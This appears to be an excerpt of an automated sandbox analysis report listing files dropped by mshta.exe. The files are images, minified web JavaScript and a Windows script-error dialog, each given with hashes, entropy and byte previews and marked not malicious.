                                                                                                                                                                                                                            SHA-512:08ADC1D8F8E009D7700E6C77FAC50CEAE4C5904B755D61603F407F775439FBF68C4410B3D2ECC22A6A70E1B625777E19FFA553C194DB970AF9022A27ED1929F1
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.PNG........IHDR...............).....pHYs................qIDATx...?t.X.....s..._9~.x.L.!l...)....%e..N?,.{....J.>N.........9...t_!....[....9'g..n.....""""""""""""""""""..D,:.~>..e.FY..K.. ..(...QRt.Gt.......=(............g\..S....Y....A.D...}.....K..qMSa.2....t1t...A}..A..@.(...r............- ..8y..4$K.\..JU..`.M..Q ...D...ZU.....m..|"....4.Yc..hBG..-..O..yp..~.!`.1.lJ....Z..D...Q..(G.Jq......t..D........r..J...q....#...Z..S...(...<..*.i..3.4..(.I.Q.K..^T..,...D..@...z7.c.AN....}.gt...AN...T.....g.@.4...."r'...t3W...Y..sr".N.YYE{.a.3..`0.).F.$].2......o.r.d...#.r.....g.R...Q$J.@...P......>.I.(Z.q...U....D.`."T..8.?.j....-.........;.....h.....Q....1P...h)..@.4`-P...hi.*.}Kt..DKm.l.7.@W8..h..M.wx......(G. "...>..y..3.e..}"Z,..-....:.HSCD...[..5..\.....U}w.t...X.CD.P<b...|[.hyH..<.]...(U.k.:......K..K...6.....bM...b..e..].....D.........D)$]..].....RH.,.K1...b#...`.;QZ1.2 T.....@'...:Q.0.2..N...t..`..e...(...D..@'...:Q.0.2..N...t..`..e...(...D.
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:PNG image data, 1250 x 313, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):230753
                                                                                                                                                                                                                            Entropy (8bit):7.995131763292654
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:6144:JOzhmQOfUCCStpBS1GPUPoHnBdNGsPbTQewPMcYDy8cislnCyVyDTG:8zkQkw1aUQ5Gsz9wUngislnCyUO
                                                                                                                                                                                                                            MD5:48E40F4B5613BF236D7779BA4C2E6F7B
                                                                                                                                                                                                                            SHA1:5D3EA09B769CE94B34CC4F58CDC0134F494CA3ED
                                                                                                                                                                                                                            SHA-256:CDDB4D4014D8CB8BCF466CFC8DA1491B6AC3C8D5FA84B7699B072D50D888E540
                                                                                                                                                                                                                            SHA-512:AEB620D81AEEF58ABFFD88E61E41F9279B89E6D3F3D4E2C2DEE545F9FBB81CF30E29F8241BDCB8DF811C1D12B49A34B5891A569F854AA8DD033CD3C7344F7D3E
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.PNG........IHDR.......9.....=G......pHYs............... .IDATx..[.$.}..........pfx.r$R.ER.%...rw....h-....'...f........_.........+..5.......]-E...Cr8.....s?u..?DfUV....:..CWW..Gdf..?..k<g.$c...j....W....x....+.J:.Xp~v:6.E.9>yN$.O.^.L..8.4.]..X\..4.._.5.....$..z......i.'V.qT&..o.u.....Y....m+.......D..K....+....lLI..L.........j.2.e..E.......V.h.?}..6.........1j.`.<....^...b..v...2\..G..%...q..\....?.....-..*..(..$.<."m:....q.yDO..7..B..).'..+..f..4....e.W...!..W$6.ZZ4..NX..W.<T.W!/Nn.]....j.q.....R6.zC.i......e.......G.e..F:.P.3..P...E.C.z.+k..H.'..?:.....I.2.=............Y.....,......o&..M"%..|*p.....tr>.{h%.....is..PdIo.$.Z$U......u..B..s.).O....,.-.&..:..^../^..[..6K...G..(.i..4m=;.Xp~..y..{.....jU..x[G.Im..243.+..Wt.".(.mM'E..d..Ia....R...b..]4..b...u?.*T.j.VX..J.W..:..y.I...d.&......x..7....-6...".e...eE..Y...p.D..h.........V~.s.zl....L.g.-.HO....d.py/.,..BW,g.Z...M..pY.Y-d.'.E..`..AB.Uc.&l.n...u..B....HyPa.A.vZE.h.....[..4.
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:PNG image data, 1250 x 313, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):290605
                                                                                                                                                                                                                            Entropy (8bit):7.995159121043485
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:6144:YFC6Qj/std8oisE2bbxulMwlzoPGo9I4YdYgif5bDlM+kyHhJBMDKA:36msti8bxulMwlEPj/tSaBJBsKA
                                                                                                                                                                                                                            MD5:2283059A30B7D44599CEA2C3F7A730C0
                                                                                                                                                                                                                            SHA1:721D117512A481E70B67BE88A348672A6208E750
                                                                                                                                                                                                                            SHA-256:17E74B21E1BAB0DCE4CA89037EEE9ED84DD704B57D68FEF666EFDF0EE4A8A2ED
                                                                                                                                                                                                                            SHA-512:1EB454BE7E8785E5BC85A2E1C6957E72F9CC6B2959FA24EBD179849959EBB1EB7FD3D53CE92AAE95DFB7D299CB4D25114D1EC7E85DE6110DA8972565585236E1
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.PNG........IHDR.......9.....=G......pHYs............... .IDATx..Y.5.Y..{..{O.~.o:.....@..d..(.....B!8....v..k%w^N.r....|./'.W..^6.A..@.AH...#..#.oz.=uwU....=..{......v..Tu.P..?...x..(..f.j...4..{4.b~......*3../..0..y......+.h.bv.w......b.......Yn.N.gr.q..9,7....9.9..-w.1......}..2..{..V.M,r.Xo......Z..x..t.F.X.n...B..~v;:...u.-.V.t{.v..Z..ii...K.......m.w......vM.{r}n._..9.M.7}."..a.~.Xt.O...L3..E.....Y..'.Q....t:..6.T.D.M..jF.....q.W..18:._.].p..lX......u..>...l.6...WB...X(QbQ$P.p%J...u.c.g..?...8tV(.3......c2a.......i.4[.}~\'...?.....A.o.L...c.H.....8.tzy.L.w..[..w...n.ir.N..W;.....\..n..z@X.](...Nj.m..+.@....%J.(............l.e?/.m..*..b.]..iu'........B....id..a;..<...../..m..}..O.U<.fbqe.j..w.e..1o>).(.[.,.9).&.b.`..;....N.n.....?.....|<Fo.%J......'j%...u..b.t.....y9.lM$.|:.......F[>KQ.... kY..B=...lNo.Zm....<.9]=.J....em[......U.-{R,.O.:..h.g]l6.$.^.:.......0.....K.m`...u.e .~.(Qb>$....(.v.R.\g..."fM.F..A_..iF!l...g.m..
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:PNG image data, 1250 x 313, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):275314
                                                                                                                                                                                                                            Entropy (8bit):7.994983258699055
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:6144:k9ccbU3487K+ZcBqm8Q5HuURofVmp13XSksw8Q+jZ:ASD2se5H/DdXSZQGZ
                                                                                                                                                                                                                            MD5:35AD7F987464144885786524DE1D9129
                                                                                                                                                                                                                            SHA1:19CF119199C7B84F48761CCB5F1E9E1402D8A2F3
                                                                                                                                                                                                                            SHA-256:19E919A123ABA9C62FD7785C3C234918412CE6C43836F36A355D648C9D3BF56C
                                                                                                                                                                                                                            SHA-512:2D4DEE3EBD2218E2AD1D154F88924750980EFACD16908D7E40EEE630FA0154C5D64A401C1D6A5D316F780A3FC1EB9A3D03B794B1F8F000BEE1D719BA45C165D4
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.PNG........IHDR.......9.....=G......pHYs............... .IDATx..W..H....w.!S}.TwuW.....l.9c.\..y.....o..4.F#.\...iU....'R...~x.@.22t D..o.W..pq\....=~.....`.CX..i..&..h...|..1.WfX:.,.|z9..E.-s..g2..r.UmZ....S..q.=....]....g.zsv.=..O...a.y.../..}.l...|Q..._...*e~.....F..m9.>....#.>.....~..o.v.Ci...%......]%..z......y./j.}>....)..l.....d....c...\......V/..E}1.....~.t.?..e.[..,.'.|..\\v<u.......p.....$.<.b.r...n.i..*.H.y...,(ay.q.t...i...........a..../...W.;b{8...G...b...}...u.............L...qH..Y...^...oV[...Fc9.B.......E..2.g..i.,.*{....}.!.......tL.i..1......U.*..}..V.....>..D.....n........!|a.cC.j.M...........n.3.#.8.q..W.......P.?e.....5.6...Ou...^....6....k........L_OO#.>.o.X.{x....jW.j_.?g..&.k....n.tu......IQ'q.....l.!......1,.J.I..is..}.r..q...#.......x...8.v=...!..............[.n./.u.[&[.HQVG.oK....".1...8......\.3...c...L.Y.mY&y..|5..U...._..U.i...n.x./zh-re^.....v.q...zw.f....O.Oy.y..G..n.....q|./.]..V.......6<6....N
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:PNG image data, 1250 x 313, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):233747
                                                                                                                                                                                                                            Entropy (8bit):7.995559821743559
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:6144:5VNSBY9f2Z1Tp0Oou2v/GrvQezgEM4SXkzQ:5vV9OfT7ogRzg0SXCQ
                                                                                                                                                                                                                            MD5:12D627F2C3A692183351D98EF7087F75
                                                                                                                                                                                                                            SHA1:816036A152AE46718A1786F728C6F022EF3D15EF
                                                                                                                                                                                                                            SHA-256:C0794D0CC10A2D54E6F7DABEF47942564A8039555A90B81CA95B2BD5000B1074
                                                                                                                                                                                                                            SHA-512:8DA71D096D5EBF16AE1A6EF6CC705BD95731A99069F38090B1C554F2BB073F3E063C2ACC932CB813E06C653BBAC40C92D9ACF4BB9E46CF7B16190686DF6052A0
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.PNG........IHDR.......9.....=G......pHYs............... .IDATx...4.y..{......g.M...)B..C..!..`...'1....U..$..._$.........A. .E..@)..(4%..E..........j.7.....wuw...>..|.{W.....z........&...q.)..4Z.>.....yeNK............9.s.Yy.6....6)..u..-..b~...?.k.g..g~....=.w.5..K..;kZ.k.l<...u.x.e....]..4.>..sb..~q.E..S......q.._@.....>.Y.t5....h.....e.]g4ti....\....J..h<f.U.r..z.....J;tN.......;3....7L7...#.......d.sM...Sg>...`...e..p.....<=..9..[D..#.....YRBs..y.]_........M.wH.n..U..!.`.D. <.W..}.{..../....{...H..q..Gl...Yw..z..[{....M.M.c.m..F3..6..2...c.8.&.^....m.<....s%9....i}.`1.P..;mY'.:.tqy.,....[...^..m.D.?.....~...L..p/....\...Ph-....p.../.."s..G...../b..#.'.o....8.#.F.&...s.U.i.X..g[k.C..M..&c].F...n.h.=<.k..j_...X....h....X]Y.Y.m..F...7...b.......!......9...$....|1...|=f_.G...(...q.._p...G...../_.?...P..M..Fi7.....Xw.3..e..m....Y."Z'S=....[.Vk^..\.3...c...$g.:.m...t..vO6I..b.q...}....}..f7J..n..C.xW5G.i_.Mq.M.}.....26.....A..M..8b.0.?Kx~..W.
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:PNG image data, 192 x 296, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):52094
                                                                                                                                                                                                                            Entropy (8bit):7.989720330046295
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:D2fyj3bwxC6LUv/OmGtLRzGndqTfU0burK0xqnbpUFNj8rgNHRErldy77OPr9mkD:QWoI/OfjzGdqT/cEnbyNTNHOcfODAMD
                                                                                                                                                                                                                            MD5:8053463CB146FB307F42877DF38CBD3B
                                                                                                                                                                                                                            SHA1:42D65C57BB9CE4950D731CBD1AAE78A476805823
                                                                                                                                                                                                                            SHA-256:53DA8D19CB85FD5D4E6AB43F5A2D252566A0703AEE0ED97B2D45BF5B6C5279C0
                                                                                                                                                                                                                            SHA-512:92838B2DBC4A121A9E53C06C01D958D5B1F466799AB05F26E142A6E3258B39B81F6C067BB9A7BEFF7845DC33EC00F17330FA903F5343C0E95B115548C3EE903F
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.PNG........IHDR.......(........\....pHYs............... .IDATx..w.\U.....;}gKv7.-I6.........A.......c.)ME..AT..<*H.T@.D.;B.T..[.%$.^6...........p)..y.fw..s..{..{...mD.p.p.0...4..m.A.u..(.C.R.!.6.O@n[6..........d^.i.Q.K.<.+.[......$.s.....\.u.T......Jc....f.7.T.:..x.x.cH...`/..@..^u..a.p$.@..g3...]@.Kw^u.....IP..).n`......%.#..."..Yq.u....q..l....E@..9.:.xI..;..+..l.._.k.1..#..Y`.. W..-.N.s......2..>0o..|.....^...gdd.T:.....>...|.![...?bY_.e.L.s...e...8....b.o|.|b1..}..g......3......./p...m..;...........|.......K~.c.,~..w.s4..p..W.....W.....T*...o.........O...g.v.T..~.k..=..S\...x...q#.l..v.S?.Q..o.-.........>...../|...s..._\.+..g...y...q#..........:.'....u.q...fv.iG.[.~..i.......1.....w.....y.'..D.q.....u..`..../....E.?.;.<.:.G........{.?......._>............c.>.Ri.=?..b.8.mc....c..y.&.?.......:.K/.........__.....7n.......n.uO>...Zo......_.t..K.,.....~....._....<.._..'.....7....A.<.x|T.._.t.!.I..p..T.......8.z......'....
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (3278)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):3363
                                                                                                                                                                                                                            Entropy (8bit):5.420736130767279
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:bG3okoZBVdsCxukqxcyjZ0YnB5pT3tH2yJaD27FKIMiFiTVMjEI:bGSa4unxcIZ0YB5pT9WeaaMIMQEI
                                                                                                                                                                                                                            MD5:AF7E27FEE65430174E7F1C7D66D9D91C
                                                                                                                                                                                                                            SHA1:8C120018222DF279E26EC10B69E30E1B532BC5BE
                                                                                                                                                                                                                            SHA-256:9E13CD8C4BD0A9B569D3DFEAA43C95E0C8E61F3D7F31BFCE269ED2895FA395E7
                                                                                                                                                                                                                            SHA-512:9E0A24C473BA5234BDE1B9014630972BAD4B16CA5AFC0D2696678F24225F310F69659864024EA45025CE5F988E0D87D27B1068BB0B08CAD404527BD8ABDB3877
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:"use strict";(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[4736],{42309:(n,t,r)=>{r.d(t,{J:()=>m,r:()=>c});var e=r(8821),i=r(85169),o=r(82248),a=r(46647),s=r(32735),u=r(56875),p=s.createElement,c=function(n){(0,o.Z)(r,n);var t=(0,a.Z)(r);function r(){return(0,e.Z)(this,r),t.apply(this,arguments)}return(0,i.Z)(r,[{key:"render",value:function(){return p(d,this.props)}}]),r}(s.Component),d=u.ZP.div.withConfig({displayName:"grid__StyledGrid",componentId:"sc-1man2hx-0"})(["flex:1;display:flex;justify-content:",";flex-wrap:wrap;"],(function(n){return n.justifyContent||"space-between"})),l=r(20011),f=s.createElement,m=function(n){(0,o.Z)(r,n);var t=(0,a.Z)(r);function r(){return(0,e.Z)(this,r),t.apply(this,arguments)}return(0,i.Z)(r,[{key:"render",value:function(){var n,t,r="theme-grid-col ".concat(null!==(n=null===this||void 0===this||null===(t=this.props)||void 0===t?void 0:t.className)&&void 0!==n?n:"").trim();return f(v,(0,l.Z)({},this.props,{className:r}))}
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (27571)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):27667
                                                                                                                                                                                                                            Entropy (8bit):5.435593973496815
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:viB2Yweb/sEDWk82DMVLXDTQHw92z+b/hNBpKA8I4udOJ5WuhyY0hSOKXq+Z2/:viBbEsWk9gU+VNBpzAuO3bOKXHZ2/
                                                                                                                                                                                                                            MD5:483BF43C5686548F38E48328EE18DC16
                                                                                                                                                                                                                            SHA1:8CE585783E2668B4A27FEDDA40FF7EDA78369510
                                                                                                                                                                                                                            SHA-256:EACE43048A1F56C8E41E2640332350C5E4C47B848EA96CFB1FFD334719A48533
                                                                                                                                                                                                                            SHA-512:287FA0855CDBAC628CDD4152B26AC6AD5321583D228E1CD1BD225E2899B4FE019CC25EECFF3760F8C693B77712D30452C2F1C08DDD02A56AF2E95C9D04AFF156
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:(self.__LOADABLE_LOADED_CHUNKS__=self.__LOADABLE_LOADED_CHUNKS__||[]).push([[4935],{25863:(e,t,n)=>{"use strict";n.d(t,{Z:()=>s});var i,r,a=n(32735);function o(){return(o=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(e[i]=n[i])}return e}).apply(this,arguments)}const s=function(e){return a.createElement("svg",o({viewBox:"0 0 18 11","aria-labelledby":"setinha1Icon setinha1Desc"},e),i||(i=a.createElement("title",null,"icone de setinha")),r||(r=a.createElement("path",{fill:"inherit",d:"M2.1 0L0 2.1 9 11l9-8.9L15.9 0 9 6.8 2.1 0z"})))}},3126:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var i,r=n(32735);function a(){return(a=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(e[i]=n[i])}return e}).apply(this,arguments)}const o=function(e){return r.createElement("svg",a({fill:"
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):3249
                                                                                                                                                                                                                            Entropy (8bit):5.4598794938059125
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:vKFrZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:CGpv+GkduSDl6LRa
                                                                                                                                                                                                                            MD5:939A9FBD880F8B22D4CDD65B7324C6DB
                                                                                                                                                                                                                            SHA1:62167D495B0993DD0396056B814ABAE415A996EE
                                                                                                                                                                                                                            SHA-256:156E7226C757414F8FD450E28E19D0A404FDBA2571425B203FDC9C185CF7FF0E
                                                                                                                                                                                                                            SHA-512:91428FFA2A79F3D05EBDB19ED7F6490A4CEE788DF709AB32E2CDC06AEC948CDCCCDAEBF12555BE4AD315234D30F44C477823A2592258E12D77091FA01308197B
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialogue.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonfa
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (32138)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):105873
                                                                                                                                                                                                                            Entropy (8bit):5.604391312073327
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:NZOfIApQCjPBY7crnrhtnywq9Av6LJ0KOPqrCvBw:WIAB4dYvBw
                                                                                                                                                                                                                            MD5:A5FC902F519F148CD28DD466E320D53E
                                                                                                                                                                                                                            SHA1:BB0F66E2CDC980B8B4F25016C2737C1D78EB623F
                                                                                                                                                                                                                            SHA-256:53ECE506CB4D0519C31B2E1FBEB8285F3D4117999C9D5A6A935473025F87DD29
                                                                                                                                                                                                                            SHA-512:90028FAC7C0429F98364A13757BDB94CEF42088B8E6F59DB97C94C37479EC6E03A07AEC3E123577021BF6860B6ABA82BD6663C2C2097AFFD4A92706D377B33EE
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:(function(sttc){var window=this;if(window.googletag&&googletag.evalScripts){googletag.evalScripts();}if(window.googletag&&googletag._loaded_)return;var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");},da=ca(this),ea=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},fa={},u=function(a,b,c){if(!c||a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}},w=function(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in t?f=t:f=da;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))brea
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (64561)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):503867
                                                                                                                                                                                                                            Entropy (8bit):5.512590647226025
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:VA+dtQf2iTXNrXIhgKQ0XCS77EDIFfuZBuXKl1T2EFi+B:qTfD6H/EauZBual1T2Ej
                                                                                                                                                                                                                            MD5:14D570E2B18EDB45C60D292320C92D9F
                                                                                                                                                                                                                            SHA1:F33FB3E83C6894F590C8C9348B11FAC2E6827EE8
                                                                                                                                                                                                                            SHA-256:04D85FDAA240E9C6964C1B3AFE75B8802720A8D9A98E6C35F346F599B1113AF4
                                                                                                                                                                                                                            SHA-512:43DD920A68256864EE489B222AC5823F5EB597071E7832D935257E1D484E84146C09BEEEEE384F38CEA25FCF489BED02AB76DE420CD66E9131AC445075F53A69
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:(function(_){/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ ./* . . Copyright Google LLC . SPDX-License-Identifier: Apache-2.0 .*/ ./* . . . Copyright (c) 2015-2018 Google, Inc., Netflix, Inc., Microsoft Corp. and contributors . Licensed under the Apache License, Version 2.0 (the "License"); . you may not use this file except in compliance with the License. . You may obtain a copy of the License at . http://www.apache.org/licenses/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software . distributed under the License is distributed on an "AS IS" BASIS, . WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. . See the License for the specific language governing permissions and . limitations under the License. .*/ ./* . .Math.uuid.js (v1.4) .http://www.broofa.com .mailto:robert@broofa.com .Copyright (c) 2010 Robert Kieffer .Dual licensed under the MIT and GPL licenses. .*/ .var ca,ea,ja,xa,za,Ea,Ga,
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (26979)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):27033
                                                                                                                                                                                                                            Entropy (8bit):5.157851706922435
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:UnlK9NO+IkZlcTj4wgUUvxRwWgaQDEvyIj:4K9NFqHlVERwbLE6I
                                                                                                                                                                                                                            MD5:4576D0CD7F770854C85A5801414B844B
                                                                                                                                                                                                                            SHA1:1D8572F543C6C17E7B3AAECBF93ADB272758A237
                                                                                                                                                                                                                            SHA-256:5C04D2D67961103EC35E526816B9FB57165F949640652607C39781DA8D8BFD77
                                                                                                                                                                                                                            SHA-512:44F763E6959056C93EC70B445A78C28E5B4F2E2689F01EC44482F3DF1A3D858148775F1A973A64DE474A5A4905DD96A636F1D292DD8CA73FD6B05B164FE829B2
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:var client;(()=>{var a={79382:(a,e,o)=>{"IntersectionObserver"in window?o.e(2078).then(o.bind(o,72078)):o.e(7946).then(o.t.bind(o,47946,23)).then((function(){o.e(2078).then(o.bind(o,72078))}))},59325:(a,e,o)=>{"use strict";o.r(e);o(79382)}},e={};function o(c){var i=e[c];if(void 0!==i)return i.exports;var t=e[c]={id:c,loaded:!1,exports:{}};return a[c].call(t.exports,t,t.exports,o),t.loaded=!0,t.exports}o.m=a,o.n=a=>{var e=a&&a.__esModule?()=>a.default:()=>a;return o.d(e,{a:e}),e},(()=>{var a,e=Object.getPrototypeOf?a=>Object.getPrototypeOf(a):a=>a.__proto__;o.t=function(c,i){if(1&i&&(c=this(c)),8&i)return c;if("object"===typeof c&&c){if(4&i&&c.__esModule)return c;if(16&i&&"function"===typeof c.then)return c}var t=Object.create(null);o.r(t);var l={};a=a||[null,e({}),e([]),e(e)];for(var r=2&i&&c;"object"==typeof r&&!~a.indexOf(r);r=e(r))Object.getOwnPropertyNames(r).forEach(a=>l[a]=()=>c[a]);return l.default=()=>c,o.d(t,l),t}})(),o.d=(a,e)=>{for(var c in e)o.o(e,c)&&!o.o(a,c)&&Object.defi
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:PNG image data, 1296 x 54, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):10907
                                                                                                                                                                                                                            Entropy (8bit):7.935173541531513
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:FSAj+8mpMrmPke8jIYJFIL7eGVcrEXdHAzypAvcYTvWy+r8u6i3rY:kROmHy7DIL7evetAEYTvB+r8e3M
                                                                                                                                                                                                                            MD5:5C15B404F306E96E2023FF22B0533758
                                                                                                                                                                                                                            SHA1:A62C74E2015E6D72281F744067DCA1A3942A21F0
                                                                                                                                                                                                                            SHA-256:B05DCE878DAC18693B76C83B5F7A154F9C3B9D5D3279B7C0DDADBF76D2F56EEE
                                                                                                                                                                                                                            SHA-512:C6995037208480BFC3E645156935676870DCF346B491DBA333E7C96CCD648E1ED085D483FCDA9AAD49E29F7EEE73E03FB6C8FE4A301D72AF4960A4BFF38198A0
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.PNG........IHDR.......6......Q......pHYs............... .IDATx..ml[W.....4#&...Zk..e..(..h(@#...h..t.."2...<h.....2......-".i.;V..B16...2.(:...5.t.Q......J+...2t."y...\.s_.&J.......s.y?...}^4].u.B.!..B.!..B....- ..B.!..B.!.|y....B.!..B.!........B.!..B.!..W.@$..B.!..B.!..B."!..B.!..B.!..*..!..B.!..B.!.P.H.!..B.!..B.q..DB.!..B.!..B.+T .B.!..B.!..B\....B.!..B.!........B.!..B.!..W.@$..B.!..B.!..B."!..B.!..B.!..*..!..B.!..B.!.P.H.!..B.!..B.q... ../....PN.0........5..m.t.=..y.....w...n.W.Jf...*<.W....o.......AOO.N.:...?|...l.}}}......ggg.....D....~..T2s.......{.|......y...z..........6%....naS.VQ...t3..v*.y...]....'..u........6.5T>........E#;."B.v...S..y.B....P( ...H........'.K..{(_...x.w?J.l..![.....M...+..Jf...W.....Z.t.....wI...P.Z0....!.E%3..tF....W._..[..J.ya.^*.....\..b.{..r../..\MY./.B_z...7.sB..0."!dK(.}o.....t,i..s;....<...J.....hI.......0,1<._.....u..........N7..R.s.@...b.......B."!dK.sy.....B..P...*@.H..!.....Q...E.!.....t..A...t..F|........o t
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 192x296, components 3
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):67933
                                                                                                                                                                                                                            Entropy (8bit):7.981811338191277
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:Ao0YGqhWx4tU6zEnTIhmIqf5wqVCVLa4FMwZPU5lS8MgiLj:jdhWStU6PJq3wWY65lFMgi/
                                                                                                                                                                                                                            MD5:19BD857867CB28413BA3C1FE2BE7C4F5
                                                                                                                                                                                                                            SHA1:477D5DF252F25A4A6DD9957A515BC819166D1C9E
                                                                                                                                                                                                                            SHA-256:C43451F8977BA4EE07AC864EFC44B4324B643797C8693F068AFA580AEB572290
